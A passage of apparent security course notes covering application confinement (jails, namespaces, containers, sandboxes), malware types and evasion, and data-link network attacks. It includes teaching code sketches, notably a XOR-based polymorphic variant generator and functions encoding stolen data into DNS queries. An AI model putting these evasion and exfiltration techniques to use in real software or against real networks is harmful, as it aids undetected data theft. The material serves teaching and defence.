  • Misunderstanding system APIs like CreateProcess() or file descriptor behavior.

Proper understanding and thorough validation practices are essential to avoid these errors.

Application confinement

Access control, while essential, is not always sufficient for securing modern systems. Traditional access control mechanisms, modeled on an access matrix, do not address restricting the operations of individual processes. For the most part, they assume that a process has the full authority of the user’s ID under which it executes.

Isolation mechanisms like containers, jails, and namespaces provide mechanisms to restrict the damage that a compromised application may do.

chroot and Jailkits

The chroot command changes the root directory for a process and its children, creating an isolated directory hierarchy where they operate. Often called a “chroot jail,” this environment limits the process’s access to other parts of the file system, improving security by restricting the scope of its operations. However, chroot can only be executed by the root user. If ordinary users could create jails, an attacker could populate a jail with a doctored password file and a link to a setuid program such as su, tricking the program into consulting the bogus file, gaining root privileges, and then escaping the jail to compromise the system.

A jailkit helps manage chroot environments by providing tools to set up and manage these restricted areas more securely. Jailkits automate setting up a controlled environment, simplifying tasks like configuring file permissions, setting up shell access, and ensuring that the jailed process has limited capabilities. Jailkits are particularly useful for web hosting environments or isolated testing spaces, where it is necessary to confine a process within a specified directory.

FreeBSD Jails

The FreeBSD jail mechanism builds on the concept of chroot but introduces additional controls, making it more robust for isolating services. Jails not only restrict file system access but also limit network access, user processes, and the permissions of the root user within the jail. This means that even if a process within the jail gains root privileges, its actions are constrained to the jail environment. FreeBSD jails prevent the root user inside the jail from interfering with the host system, providing a more secure and controlled environment compared to chroot.

Linux Application Isolation

Linux provides several isolation mechanisms to securely manage applications, including namespaces, capabilities, and control groups (cgroups):

  1. Namespaces: Namespaces isolate different aspects of the system environment for processes, giving each process a unique view of system resources:
  • IPC (Inter-Process Communication): Isolates communication between processes, restricting shared memory access.
  • Network: Gives each process its network stack, with separate network interfaces, routing tables, and firewall rules.
  • Mount (File System): Provides isolated file system views, so a process can have its own file hierarchy.
  • PID (Process IDs): Creates isolated process trees, allowing processes to have their own set of process IDs.
  • User/Group IDs: Allows for mapping of user IDs within namespaces, enabling processes to have different user IDs from the host.
  • UTS (hostname): Offers independent host and domain names in each namespace.
  2. Capabilities: Linux capabilities break down root privileges into smaller units, allowing processes to execute specific privileged operations without full root access. For example, a process can have network control or file modification privileges without full system control, improving security by reducing the risk of abuse if the process is compromised. Capabilities allow an administrator to grant a process specific elevated privileges, regardless of what user ID that process runs under. Even if it runs as root (user ID 0), it can still have a limited ability to run privileged operations.

  3. Control Groups (cgroups): Cgroups manage resource allocation for processes, limiting CPU, memory, file I/O, and network I/O usage. This prevents processes from monopolizing resources, maintaining system stability and performance.

Containers

Containers are lightweight environments that package an application and its dependencies into isolated user spaces, leveraging namespaces, cgroups, and capabilities for security. This approach allows each container to operate independently on a shared OS, with controlled access to system resources.

Containers separate policy from enforcement by abstracting the application environment, reducing comprehension errors by simplifying dependency management. Unlike virtual machines (VMs), containers share the host OS kernel, making them faster and more resource-efficient since they do not require a full OS for each instance.

Key Components of Containers

  • Namespaces: Isolate processes within their own environments.
  • Cgroups: Control resource allocation to prevent resource overuse.
  • Capabilities: Limit privileged operations, reducing security risks.
  • Copy-on-Write File System: Allows containers to share a base file system while adding unique changes, saving space and improving efficiency.

While containers and virtual machines (VMs) both provide isolation, they differ fundamentally. Containers share the host OS kernel, making them more lightweight and faster to deploy. VMs, in contrast, emulate entire systems, including a separate OS, which consumes more resources but provides stronger isolation due to the OS-level separation.

Despite their benefits, containers can introduce security risks. For example, shared kernel vulnerabilities may allow a compromised container to impact the host. Furthermore, misconfigured capabilities or insecure default settings can lead to privilege escalation attacks. Using up-to-date container images and adhering to strict privilege management can help mitigate these risks.

Virtual Machines

As a general concept, virtualization is the addition of a layer of abstraction to physical devices. With virtual memory, for example, a process has the impression that it owns the entire memory address space. Different processes can all access the same virtual memory location and the memory management unit (MMU) on the processor maps each access to the unique physical memory locations that are assigned to the process.

Process virtual machines present a virtual CPU that allows programs to execute on a processor that does not physically exist. The instructions are interpreted by a program that simulates the architecture of the pseudo machine. Early pseudo-machines included O-code for BCPL and P-code for Pascal. The most popular pseudo-machine today is the Java Virtual Machine (JVM). This simulated hardware does not even pretend to access the underlying system at a hardware level. Process virtual machines will often allow “special” calls to invoke system functions or provide a simulation of some generic hardware platform.

Operating system virtualization is provided by containers, where a group of processes is presented with the illusion of running on a separate operating system but, in reality, shares the operating system with other groups of processes – they are just not visible to the processes in the container.

System virtual machines allow a physical computer to act like several real machines, with each machine running its own operating system (on a virtual machine) and applications that interact with that operating system. The key to this machine virtualization is not to allow each operating system to have direct access to certain privileged instructions in the processor. These instructions would allow an operating system to directly access I/O ports, MMU settings, the task register, the halt instruction, and other parts of the processor that could interfere with the processor’s behavior and with the other operating systems on the system. Instead, a trap and emulate approach is used. Privileged instructions, as well as system interrupts, are caught by the Virtual Machine Monitor (VMM), also known as a hypervisor. The hypervisor arbitrates access to physical resources and presents a set of virtual device interfaces to each guest operating system (including the memory management unit, I/O ports, disks, and network interfaces). The hypervisor also handles preemption. Just as an operating system may suspend a process to allow another process to run, the hypervisor will suspend an operating system to give other operating systems a chance to run.

The two configurations of virtual machines are hosted virtual machines and native virtual machines. With a hosted virtual machine (also called a type 2 hypervisor), the computer has a primary operating system installed that has access to the raw machine (all devices, memory, and file system). This host operating system does not run in a virtual environment. One or more guest operating systems can then be run on virtual machines. The VMM serves as a proxy, converting requests from the virtual machine into operations that get sent to and executed on the host operating system. A native virtual machine (also called a type 1 hypervisor) is one where there is no “primary” operating system that owns the system hardware. The hypervisor is in charge of access to the devices and provides each operating system drivers for an abstract view of all the devices.

Security implications

Virtual machines (VMs) provide a deep layer of isolation, encapsulating the operating system along with all the applications it runs and files it needs within a secure environment separate from the physical hardware. Compared with lighter confinement methods such as containers, a compromise within a VM affects only that VM, much as it would on a separate physical machine.

Despite this isolation, VMs can still pose risks if compromised. Malicious entities can exploit VMs to attempt attacks on other systems within the same physical environment, leveraging the shared physical resources. Such scenarios underscore potential vulnerabilities in even well-isolated environments, highlighting the need for vigilant security practices across all layers.

A specific threat in such environments is the creation of covert channels through side-channel attacks. These channels exploit system behaviors, such as CPU load variations, to clandestinely transmit information between VMs, bypassing conventional communication restrictions. This technique shows how attackers can bridge gaps between highly secure and less secure systems, manipulating physical resource signals to communicate stealthily.

Application Sandboxing

Application sandboxing provides a restricted environment to safely execute potentially harmful software, minimizing system-wide risks. It restricts program operations based on predefined rules, allowing only certain actions within the system.

This mechanism is crucial for running applications from unknown sources and is also extensively used by security researchers to monitor software behavior and detect malware. Sandboxes enforce restrictions on file access, network usage, and other system interactions, offering a fundamental layer of security by controlling application capabilities in a more fine-grained manner than traditional methods like containers or jails.

While mechanisms like jails and containers, which include namespaces, control groups, and capabilities, are great for creating an environment to run services without the overhead of deploying virtual machines, they do not fully address the ability to restrict what normal applications can do.

We want to protect users from their applications: give users the ability to run apps but restrict what those apps can do on a per-app basis, such as opening files only with a certain name or permitting only TCP networking.

Sandboxing is currently supported on a wide variety of platforms at either the kernel or application level. We’ll examine three ways in which they can be built.

1. Application sandboxing via system call interposition & user-level validation

An example of a user-level sandbox is the Janus sandbox. Application sandboxing with Janus involves creating policies to define permissible system calls for each application. Janus uses a kernel module to intercept these calls and sends them to a user-level monitor program that decides whether to allow or block the call based on the configured policy file. Challenges include maintaining system state across processes and handling complex scenarios like network and file operations, pathname parsing, and potential race conditions (TOCTTOU issues).

2. Application sandboxing with integrated OS support

The better alternative to having a user-level process decide on whether to permit system calls is to incorporate policy validation in the kernel. Some operating systems provide kernel support for sandboxing. These include the Android Application Sandbox, the iOS App Sandbox, the macOS sandbox, and AppArmor on Linux. Microsoft introduced the Windows Sandbox in December 2018, but this functions far more like a container than a traditional application sandbox, giving the process an isolated execution environment.

Seccomp-BPF (SECure COMPuting with Berkeley Packet Filters) is a Linux security framework that limits which system calls a process can execute. It uses the Berkeley Packet Filter to evaluate system calls as “packets,” applying rules that govern their execution. Though it doesn’t provide complete isolation on its own, Seccomp is an essential building block for robust application sandboxes when combined with other mechanisms like namespaces and control groups.

3. Process virtual machine sandboxes: Java

The Java Virtual Machine (JVM) was designed to run compiled Java applications in a controlled manner on any system regardless of the operating system or hardware architecture. The JVM employs three main components to ensure security:

  1. Bytecode Verifier: Scrutinizes Java bytecode before execution to confirm it strictly adheres to Java’s rules, rejecting code that would bypass access controls or exceed array bounds.

  2. Class Loader: This component safeguards against the loading of untrusted classes and ensures the integrity of runtime environments through Address Space Layout Randomization (ASLR), maintaining the security of essential class libraries.

  3. Security Manager: This enforces protection domains that define permissible actions within the JVM. It intercepts calls to sensitive methods, verifying permissions against a security policy, which can restrict actions like file and network access, preventing operations not allowed by the policy.

Building an effective sandbox in Java has proven complex, highlighted by persistent bugs, especially in the underlying C libraries and across different JVM implementations. Moreover, Java’s allowance for native methods can bypass these security mechanisms, introducing potential risks.

Malware

Malware is software intentionally designed to cause harm to computers, networks, or users. It can steal data, damage systems, hijack devices, or spy on users. Common forms of malware include viruses, worms, Trojans, ransomware, spyware, adware, and rootkits. Malware typically operates without the user’s knowledge and may enter systems through vulnerabilities, social engineering, or compromised hardware.

Worms and Viruses

Understanding the distinction between worms and viruses helps clarify how malware spreads and how defenses must respond. Although both are self-replicating, they follow fundamentally different mechanisms for propagation. Worms spread autonomously by exploiting network vulnerabilities, requiring no user interaction. Viruses, in contrast, rely on user actions and attach themselves to legitimate files or programs, spreading only when these files are executed.

Core Components of Malware

Malware is often built as a multi-stage system whose functional stages reflect its life cycle inside a target system. Breaking down these components shows how malware infiltrates, persists, communicates, and executes its objectives; each stage plays a role in enabling, maintaining, and concealing the attack.

Delivery (initial access)
Malware reaches a system via email attachments, malicious websites, infected USB drives, or software exploits. This is the point of initial access.
Installation (persistence)
To persist on the system, malware may alter startup settings, inject itself into running processes, or manipulate the registry.
Command and Control (C2)
Many malware families connect to external servers to receive instructions, send stolen data, or download updates.
Payload Execution
The payload is the malicious task executed by the malware, such as stealing data, logging keystrokes, or encrypting files.
Triggers
Malware may lie dormant until activated by a condition, such as a time, command, or system event, to avoid detection.

Exploiting Vulnerabilities

One powerful technique malware uses to gain control is exploiting software or configuration vulnerabilities. These weaknesses in software or hardware allow attackers to bypass security mechanisms and execute unauthorized code.

Zero-Day Exploits

Zero-day exploits target vulnerabilities that are unknown to the software vendor and have not yet been patched. Because no fix exists, these exploits are highly valuable and effective, especially for attackers who want to maintain stealth. Zero-day vulnerabilities are often discovered by security researchers, criminal organizations, or state-sponsored actors. They may be sold on black markets or used in targeted attacks before being disclosed. Once a zero-day is made public or used in a widespread attack, defenders have zero days to respond – hence the name. These exploits often form the initial step in sophisticated malware campaigns, especially against high-value targets.

N-Day Exploits

N-day exploits take advantage of known vulnerabilities for which patches have already been released. The term “N-day” refers to the number of days since the vulnerability was disclosed. Although a fix is available, many systems remain unpatched due to delays in updates, system compatibility concerns, or neglect. Attackers scan for these exposed systems and exploit them using publicly available tools or reverse-engineered patch information. N-day exploits are a common part of broad-based malware campaigns, since they allow attackers to compromise large numbers of systems with relatively low effort.

Zero-Click Exploits

These require no user interaction. Simply receiving a message or file can trigger the attack, often in messaging apps or file viewers.

Malware Activities

Once malware gains a foothold, it can perform various actions depending on its design and purpose. These activities may be stealthy or destructive, short-lived or persistent, targeted or indiscriminate.

Exfiltration
Malware may steal documents, credentials, emails, or other sensitive data and transmit them to an attacker.
Surveillance
Spyware records browsing, typing, communication, and sometimes webcam or microphone input.
Keylogging
Keyloggers capture user input to steal passwords and sensitive information.
Ransomware
Ransomware encrypts data or locks devices, demanding payment for restoration. Some variants also steal data.
Data Wiping
Wipers destroy data, rendering recovery impossible. Often used for sabotage.
Adware
Adware floods the user with advertisements and may track user behavior for profit.
Resource Abuse
Malware may use system resources for unauthorized purposes, such as cryptomining or participating in botnets.
Remote Control
Remote Access Trojans (RATs) enable attackers to manipulate the system, install further malware, and monitor users.

Infiltration Techniques

Malware must first gain access to a target system. This section examines the diverse tactics attackers use to deliver and activate malware on unsuspecting victims’ devices, whether by exploiting software flaws or by deceiving users.

File Infector Viruses

File infector viruses attach themselves to executable files such as .exe, .com, or .dll files. When the infected file is run, the virus executes first, often launching the legitimate program afterward to avoid detection. These viruses can replicate by infecting other executable files on the system or shared drives. Some variants spread across network shares or removable media, embedding themselves into system files. File infector viruses may be destructive, corrupting or deleting files, or stealthy, silently spreading and delivering payloads such as spyware or ransomware. Because they modify existing programs, they can be difficult to detect without hashing or integrity-checking mechanisms.
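The integrity-checking defense mentioned above can be sketched in a few lines: record cryptographic digests of known-good executables, then compare them on a later scan. This is a minimal illustration (the file names and contents are made up, not from any real tool):

```python
import hashlib

def file_hash(data: bytes) -> str:
    """SHA-256 digest of a file's contents."""
    return hashlib.sha256(data).hexdigest()

# Baseline: digests of known-good executables, recorded at install time.
baseline = {"app.exe": file_hash(b"original program bytes")}

# Later scan: a file infector has prepended its own code to the binary.
scanned = {"app.exe": file_hash(b"VIRUS STUB" + b"original program bytes")}

# Any digest mismatch flags a modified (possibly infected) file.
modified = [name for name in baseline if baseline[name] != scanned.get(name)]
```

Because any change to the file changes the digest, even a stealthy infector that preserves the program's behavior is caught, which is why file infectors are hard to hide from hashing-based integrity checks.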

Infected Flash Drives

Infected USB drives are a practical and dangerous malware delivery method, especially in environments with limited network exposure. On older Windows systems, attackers exploited AutoRun to automatically launch malware upon insertion. More sophisticated attacks modify the firmware of the USB device itself—a technique known as BadUSB. In this scenario, the device impersonates a keyboard and types malicious commands as soon as it’s plugged in, bypassing traditional security. USB drop attacks rely on human curiosity; attackers leave compromised drives in public places, hoping a target will plug one in. These drives may contain enticing filenames or documents (e.g., labeled as financial reports or photos), which activate malware when opened. Even when not infected, USB drives can cause data leakage if they contain sensitive files and are accessed by unauthorized users.

Code Exploits

Buffer overflows, command injection, and other software flaws allow attackers to run code without authorization.

Compromised Tools and Firmware

Malicious compilers or modified firmware can inject backdoors during compilation or device use. Ken Thompson’s Reflections on Trusting Trust reminds us that tools like compilers can be modified to enable undetectable backdoors even in secure-looking software.

Social Engineering

Attackers often bypass technical defenses by targeting the human element. Social engineering is the practice of manipulating people into performing actions that compromise security, such as installing malware or revealing sensitive information. These techniques are often delivered through familiar interfaces such as emails, websites, pop-ups, and text messages, and rely on urgency, curiosity, fear, or trust to deceive users.

Credential Stuffing

Attackers reuse leaked credentials to gain access to other systems where users have reused passwords.

Supply Chain Attacks

Malware can be inserted during software development or distribution. This includes tampered installers, compromised libraries, or poisoned updates. Examples include the SolarWinds breach and the 2024 xz Utils backdoor.

Macro Viruses

These are embedded in documents using scripting languages like VBA (Visual Basic for Applications) or embedded JavaScript in PDF documents. Users are often tricked into enabling macros, which can lead to infection and replication across files.

Where Malware Resides

After infiltration, malware must remain accessible and persistent. It embeds itself in different layers of the system, often choosing locations that are hard to inspect or clean, in order to maintain access and evade detection.

Boot Sector and Bootloader

Bootkits infect the system before the OS loads, making removal difficult.

Backdoors

Backdoors are covert access points that bypass normal authentication mechanisms, granting attackers unauthorized entry into a system. They may be introduced during software development, inserted by insiders, or installed post-compromise by malware. Once in place, backdoors allow attackers to return to the system without re-exploiting vulnerabilities. They can be implemented as hardcoded credentials, hidden administrative tools, or malware components that listen for specific commands. Backdoors are often difficult to detect because they blend in with legitimate software or remain dormant until triggered.

Remote Access Trojans (RATs)

Remote Access Trojans (RATs) are a class of malware designed to provide attackers with complete remote control over an infected system. Once a RAT is installed, the attacker can access files, monitor user activity, use the webcam or microphone, capture keystrokes, and deploy additional malware. RATs are typically delivered via phishing emails, trojanized software, or drive-by downloads. They often include features to hide from detection, such as encryption, polymorphism, and rootkit components. RATs are especially dangerous because they give attackers persistent and interactive access, enabling long-term surveillance or sabotage.

Rootkits

Rootkits are stealthy software components designed to conceal the presence of malware by altering how the operating system functions. They may hide files, processes, registry entries, or network activity associated with the malicious software. Rootkits can operate in user mode, affecting high-level OS utilities, or in kernel mode, modifying core operating system behavior. Hypervisor rootkits go even deeper, running below the OS to gain complete control over the system while remaining nearly invisible. Because rootkits interfere directly with system operations, they are difficult to detect and remove, often requiring specialized forensic tools or complete system reinstallation.

Fileless Malware

Fileless malware operates from memory or the registry, avoiding disk writes and evading traditional antivirus detection.

Social Engineering

Attackers often bypass technical defenses by targeting the human element: manipulating people into performing actions that compromise security, such as installing malware or revealing sensitive information. The techniques in this section are delivered through familiar channels like emails, websites, pop-ups, and text messages, and rely on urgency, curiosity, fear, or trust to deceive users.

Trojans

‘Trojan’ is short for ‘Trojan Horse,’ referring to the ancient Greek tale in which soldiers hid inside a giant wooden horse presented as a seemingly harmless gift. In computing, a Trojan horse is a malicious program disguised as legitimate software, intended to deceive the user into installing it.

The user is tricked into downloading and installing the Trojan, believing it serves a beneficial function. Once installed, the Trojan silently executes harmful actions, such as installing spyware, opening backdoors, or granting remote access. Trojans may appear as system utilities, games, updates, or cracked software. Some are embedded within seemingly legitimate downloads from file-sharing sites or phishing emails, and others are bundled with fake security tools.

Phishing

Phishing is a form of fraud that uses deceptive communication, usually email, to trick users into taking unsafe actions, such as clicking on malicious links or providing login credentials. These messages often impersonate legitimate sources like banks, cloud services, or internal IT teams. While generic phishing messages are broadly distributed, more advanced forms include spear phishing and smishing.

Spear phishing targets a specific individual or organization using personalized information to appear credible. For example, a message may reference a project the user is working on or appear to come from a trusted colleague. This makes it far more convincing and harder to detect.

Smishing is phishing delivered through SMS or messaging apps. Victims may receive urgent texts claiming to be from a bank, delivery service, or administrator, prompting them to click a malicious link or enter credentials on a spoofed site. These attacks are especially dangerous on mobile devices, where it is harder to verify links or sender identities.

Deceptive Pop-Ups

Fake alerts trick users into running code or downloading files.

Malicious websites may look legitimate or use typosquatting to deceive users. Masked links also hide the true destination.

QR Code Attacks

Malicious QR codes can link to phishing pages or trigger unintended downloads.

Information Gathering Techniques

Some malware is designed to quietly collect sensitive information over time, monitoring systems passively without drawing attention.

Keyloggers

Capture user keystrokes to extract sensitive information.

Side-Channel Attacks

Side-channel attacks extract sensitive information by analyzing indirect data produced by a system, such as electromagnetic emissions, power consumption, timing variations, or acoustic signals. Unlike traditional attacks that exploit software vulnerabilities, side-channel attacks take advantage of physical or behavioral characteristics of a system. For example, attackers may observe CPU power fluctuations to infer encryption keys, or use variations in typing sounds to reconstruct text input. These attacks are especially dangerous in high-security environments where systems are otherwise locked down.
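The timing variation mentioned above is easy to create by accident. The toy comparison below returns as soon as it finds a mismatching byte, so its running time leaks how many leading bytes of a guess were correct; the standard remedy in Python is `hmac.compare_digest`, which takes time independent of where the bytes differ. This is an illustrative sketch, not code from any particular attack:

```python
import hmac

def naive_compare(a: bytes, b: bytes) -> bool:
    # Returns at the first mismatching byte, so its running time leaks
    # how many leading bytes of the guess were correct.
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:
            return False
    return True

def constant_time_compare(a: bytes, b: bytes) -> bool:
    # hmac.compare_digest examines the data in a way that does not
    # depend on where (or whether) the inputs differ.
    return hmac.compare_digest(a, b)
```

An attacker who can measure the naive version's timing can recover a secret one byte at a time instead of brute-forcing the whole value.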

Side-channel techniques can be embedded in malicious software to quietly exfiltrate data over non-traditional channels. For instance, malware might encode data in blinking LEDs, fan speed fluctuations, or even inaudible sound signals. Because these channels fall outside typical monitoring systems, side-channel attacks are hard to detect and often go unnoticed. They are especially useful in air-gapped environments (systems not connected to external networks), where conventional data exfiltration via networks is not possible.

Botnets and Control

Some malware converts infected systems into remotely controlled bots. Coordinated botnets can perform large-scale operations and are often managed via command-and-control (C2) infrastructure.

A bot is an infected device under an attacker’s control. Botnets consist of many bots coordinated to perform large-scale actions like DDoS attacks, spamming, or mining cryptocurrency. Bots receive commands via C2 infrastructure.

Defending Against Malware

Effective malware defense involves a combination of prevention, detection, and response: layered defenses that combine technical controls with user awareness. This section outlines several strategies that reduce the risk and impact of infections.

File and Access Control

Restrict what users and programs can access. Use Mandatory Access Control (MAC) and the principle of least privilege.

User Warnings

Warnings before running unknown content help prevent accidental execution of malware. Training helps users interpret and respond appropriately.

Anti-Malware Technologies

Anti-malware technologies use a combination of static and dynamic techniques to detect and block malicious software.

Signature-based scanning is one of the most traditional and widely used methods. It involves scanning files for known byte patterns that uniquely identify malware. This technique is fast and effective against previously identified threats, but cannot detect new or modified malware that lacks a known signature.
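At its core, signature scanning is a byte-pattern search. The sketch below uses an invented two-entry signature database (the names and patterns are placeholders, not real malware signatures) to show both the strength and the weakness: a known pattern is found instantly, but any variant whose bytes differ goes undetected.

```python
# Toy signature database: byte patterns that identify known malware families.
# These names and patterns are invented for illustration.
SIGNATURES = {
    "DemoWorm":   b"\xde\xad\xbe\xef",
    "DemoTrojan": b"EVIL_PAYLOAD_MARKER",
}

def scan(data: bytes) -> list[str]:
    """Return the names of every known signature found in the bytes."""
    return [name for name, pattern in SIGNATURES.items() if pattern in data]
```

A real scanner adds efficient multi-pattern matching and unpacking, but the fundamental limitation is visible here: `scan` can only flag patterns it already knows.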

Heuristic analysis uses rules and pattern recognition to identify suspicious behaviors or characteristics common to malware, even if the code itself is unknown. Static heuristics examine code structure without executing it, while behavioral analysis, or dynamic heuristics, monitors how a file acts when executed. Behavioral analysis can detect malware that tries to evade static scanning by observing actions like unusual file access, system changes, or network communication. These techniques are especially useful for detecting zero-day threats or polymorphic malware that changes its appearance to avoid signature detection.

System Hardening

Removing administrative rights, isolating risky applications, and using containerization limit malware impact.

Malware Evasion Strategies

Modern malware uses evasion techniques to bypass defenses and remain undetected. These strategies range from encryption and obfuscation to conditional execution and stealthy communication.

Encryption

Malware may encrypt its contents to avoid detection by signature scanners.

Packing

Packing is a technique used to obfuscate malware by compressing or encrypting the code so that its true nature is hidden from signature-based scanners. The packed executable contains a small stub program that decompresses or decrypts the original malicious code in memory at runtime. Packers are commonly used by malware authors to make reverse engineering and analysis more difficult. Many commercial packers are legitimate tools used for software protection, but they are frequently abused in malware distribution. Security tools must often unpack the file or emulate its execution to detect the real payload.
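The transform a packer applies can be sketched with ordinary compression: the stored bytes no longer resemble the original payload, and a small stub reverses the transform in memory at load time. This is only an illustration of the principle using `zlib` stand-in bytes; real packers decrypt or decompress into executable memory and jump into it.

```python
import zlib

# Placeholder bytes standing in for the real malicious machine code.
payload = b"pretend this is the malicious machine code" * 4

# "Pack": compress the payload so its bytes no longer match any signature.
packed = zlib.compress(payload)

def stub_run(packed_blob: bytes) -> bytes:
    """The stub executed at load time: recover the original code in memory."""
    return zlib.decompress(packed_blob)
```

This is why security tools must unpack the file or emulate its execution: scanning the packed bytes on disk reveals nothing about the payload.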

Polymorphism

Polymorphic malware modifies its own code with each infection, creating unique signatures while preserving functionality. This is typically achieved through code obfuscation, encryption with variable keys, or insertion of junk instructions that don’t change the algorithm (such as no-ops). The mutation occurs every time the malware replicates or installs itself, making it difficult for traditional signature-based detection tools to identify. Some polymorphic engines are highly advanced, capable of generating millions of variants. This ability to change appearance while maintaining behavior is especially effective at evading static detection mechanisms.
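A minimal polymorphic engine can be sketched with a one-byte XOR encoding: every generation picks a fresh key, so the stored bytes differ, yet a tiny decoder stub always recovers the same payload. The payload and helper names below are invented for illustration; real engines use far more elaborate mutation.

```python
import os

PAYLOAD = b"the invariant malicious logic"  # placeholder bytes

def make_variant(payload: bytes) -> bytes:
    """Emit a new copy: XOR-encoded under a fresh random key, with the
    key stored as the first byte for the decoder stub to use."""
    key = os.urandom(1)[0] | 0x01        # any odd key, never zero
    return bytes([key]) + bytes(b ^ key for b in payload)

def decoder_stub(variant: bytes) -> bytes:
    """What runs first on the victim: decode, then 'execute' the payload."""
    key, body = variant[0], variant[1:]
    return bytes(b ^ key for b in body)
```

Each variant's bytes differ from the plaintext payload (the key is never zero), so a signature computed over one generation fails to match the next, even though the decoded behavior never changes.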

Delayed Execution

Some malware delays its execution until certain conditions are met, such as the passage of time, detection of specific user behavior, or receipt of a remote command. This strategy helps avoid detection during automated sandbox analysis, which typically only observes programs for a short duration. Delayed execution allows the malware to remain dormant until it is less likely to be analyzed or intercepted.

Many advanced malware variants also include checks to determine whether they are running in a virtual machine or sandboxed environment, which are commonly used by security researchers. These checks might involve detecting the presence of analysis tools, unusual hardware configurations, or short uptimes. If such an environment is detected, the malware may choose to disable itself, exit quietly, or exhibit benign behavior to avoid exposure. By withholding its malicious behavior until it confirms it is on a real user system, the malware greatly reduces its chance of detection during early stages of analysis.

Covert Channels

Covert channels are unconventional methods used by malware to communicate or exfiltrate data in ways that bypass standard security monitoring tools. These channels are not designed for data transmission and often repurpose benign or obscure system features. One common example is DNS tunneling, where malware encodes data into DNS queries or responses to covertly send or receive information from a command-and-control server. Because DNS is a fundamental service that is rarely blocked, it offers an effective and persistent communication path.
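The DNS tunneling idea above boils down to fitting arbitrary bytes into hostname labels. The sketch below (the domain name is made up) Base32-encodes data, because DNS names are case-insensitive with a restricted alphabet, and splits it into 63-character labels, the maximum DNS allows:

```python
import base64

def tunnel_queries(secret: bytes, domain: str) -> list[str]:
    """Encode stolen data as DNS lookups under an attacker-run domain."""
    # Base32 fits DNS's case-insensitive, limited label alphabet.
    b32 = base64.b32encode(secret).decode().rstrip("=").lower()
    # DNS labels are limited to 63 characters each.
    chunks = [b32[i:i + 63] for i in range(0, len(b32), 63)]
    return [f"{i}.{chunk}.{domain}" for i, chunk in enumerate(chunks)]

def reassemble(queries: list[str]) -> bytes:
    """What the attacker's authoritative server recovers from its query log."""
    ordered = sorted(queries, key=lambda q: int(q.split(".")[0]))
    b32 = "".join(q.split(".")[1] for q in ordered).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))
```

Each lookup for a name under the attacker's domain is forwarded to the attacker's authoritative name server, which simply logs the queries and decodes them; no connection to the attacker is ever made directly.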

Other covert channels may involve encoding data in network packet timing, unused header fields, or even through system artifacts such as LED blink patterns, sound, or CPU usage patterns. These methods are particularly useful in environments with tight security controls or where outbound internet access is restricted. By hiding communication within normal system operations, covert channels help malware remain undetected while continuing to exfiltrate sensitive information or receive instructions.

Trusting Trust

Ken Thompson’s essay reminds us that tools like compilers can be malicious, enabling undetectable backdoors even in secure-looking software.

Honeypots

Honeypots are deliberately vulnerable decoy systems used to attract and monitor attackers. They let defenders study attack behavior and divert or delay adversaries while protecting real systems, making them valuable tools for research, detection, and diversion in cybersecurity operations.

Network Security

The Internet is designed to interconnect various networks, each potentially using different hardware and protocols, with the Internet Protocol (IP) providing a logical structure atop these physical networks. IP inherently expects unreliability from underlying networks, delegating the task of packet loss detection and retransmission to higher layers like TCP or applications. Communication via IP involves multiple routers and networks, which may compromise security due to their unknown trust levels.

The lower layers of the OSI model help describe the networking protocol stack used with IP:

  1. Physical Layer: Involves the actual network hardware.
  2. Data Link Layer: Manages protocols for local networks like Ethernet or Wi-Fi.
  3. Network Layer: Handles logical networking and routing across physical networks via IP.
  4. Transport Layer: Manages logical connections, ensuring reliable data transmission through TCP, or provides simpler, unreliable communication via UDP.

Each layer plays a critical role in ensuring data is transmitted securely and efficiently across the internet.

Data link layer

In Ethernet and Wi-Fi networks, the data link layer governs how devices communicate over a local link. Ethernet uses physical cables and switches, while Wi-Fi uses radio signals and access points. This layer relies on MAC (Media Access Control) addresses for local delivery. Security was not a design priority for the data link layer, making it vulnerable to several attacks. Notably, Wi-Fi includes encryption, but only between the client device and the access point, not end-to-end between communicating hosts.

Switch CAM table overflow

Intercept traffic by forcing the switch to behave like a hub.

Switches maintain a Content Addressable Memory (CAM) table that maps MAC addresses to physical switch ports, enabling efficient packet delivery. A CAM table overflow attack floods the switch with packets from bogus MAC addresses, exceeding the table’s capacity. When the table is full, the switch fails open, broadcasting all frames to all ports. This behavior allows an attacker to passively monitor all traffic on the LAN.
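The fail-open behavior can be modeled with a toy switch: once the CAM table is full, new addresses cannot be learned, so frames for them are flooded out every port. This simulation (class and MAC names are invented) is a sketch of the mechanism, not of any real switch firmware:

```python
class ToySwitch:
    """Learns MAC-to-port mappings until its CAM table fills; frames to
    unknown MACs are flooded out every port (the fail-open behavior)."""

    def __init__(self, num_ports: int, cam_capacity: int):
        self.num_ports = num_ports
        self.cam_capacity = cam_capacity
        self.cam: dict[str, int] = {}

    def learn(self, src_mac: str, port: int) -> None:
        # A new address is only learned if there is room in the table.
        if src_mac in self.cam or len(self.cam) < self.cam_capacity:
            self.cam[src_mac] = port

    def forward(self, dst_mac: str, in_port: int) -> list[int]:
        if dst_mac in self.cam:
            return [self.cam[dst_mac]]
        # Unknown destination: flood out every port except the ingress.
        return [p for p in range(self.num_ports) if p != in_port]

sw = ToySwitch(num_ports=4, cam_capacity=3)
sw.learn("victim-mac", 1)
# Attacker on port 3 floods bogus source addresses until the table is full.
for i in range(10):
    sw.learn(f"bogus-{i}", 3)
# A host that comes online now cannot be learned, so its traffic is
# flooded to every port, including the attacker's.
sw.learn("new-host", 2)
```

Port security limits defeat this by capping how many MAC addresses one port may contribute, so the attacker's flood never fills the table.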

To defend against this, port security features on managed switches can limit the number of allowed MAC addresses per port. Additional countermeasures include enabling 802.1X authentication to restrict access until devices are verified.

VLAN hopping (switch spoofing)

Access traffic across multiple VLANs by impersonating a switch.

Virtual Local Area Networks (VLANs) segment network traffic to improve performance and security. VLAN trunking, using IEEE 802.1Q tagging, allows traffic from multiple VLANs to traverse a single switch-to-switch link. In a VLAN hopping attack, an adversary mimics a switch by initiating a trunk connection. This switch spoofing tricks the real switch into forwarding traffic from all VLANs to the attacker’s device.

Defense involves explicitly configuring trunk ports on managed switches and disabling automatic trunk negotiation on access ports. This ensures only authorized ports carry multi-VLAN traffic.

ARP cache poisoning

Redirect IP packets by changing the IP address to MAC address mapping.

The Address Resolution Protocol (ARP) resolves IP addresses to MAC addresses on a local network. In ARP cache poisoning, an attacker sends forged ARP responses, often unsolicited, to associate their MAC address with another host’s IP. As a result, traffic meant for the victim is misrouted to the attacker, enabling man-in-the-middle interception or denial of service.
